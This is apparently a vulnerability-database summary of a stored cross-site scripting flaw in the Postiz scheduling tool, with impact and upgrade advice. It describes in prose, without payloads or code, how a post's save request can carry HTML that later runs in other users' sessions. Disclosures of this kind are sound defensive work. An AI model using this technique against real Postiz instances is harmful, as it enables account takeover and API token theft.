Postiz Stored Cross-Site Scripting Vulnerability
Vulnerability
A stored cross-site scripting vulnerability has been identified in Postiz, an AI social media scheduling tool, in versions 2.21.6 prior to 2.21.7. The issue allows any authenticated user who can create a post to inject arbitrary HTML into the post content. This is achieved by manipulating the save request of their own post. The injected HTML is then rendered in the public preview link, using dangerouslySetInnerHTML, on the main application origin. This vulnerability could lead to persistent compromise of other users by exploiting the post preview feature.
Impact
Exploitation of this vulnerability allows an authenticated user to inject malicious HTML that is stored and later executed in the context of other users, potentially leading to cross-site scripting attacks. According to the advisory, this vulnerability could be exploited to gain full admin permissions on a team, allowing the attacker to remove all posts and integrations, and access the API token of the victim for persistent access.
Remediation
Users are advised to upgrade to Postiz version 2.21.7 or later.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.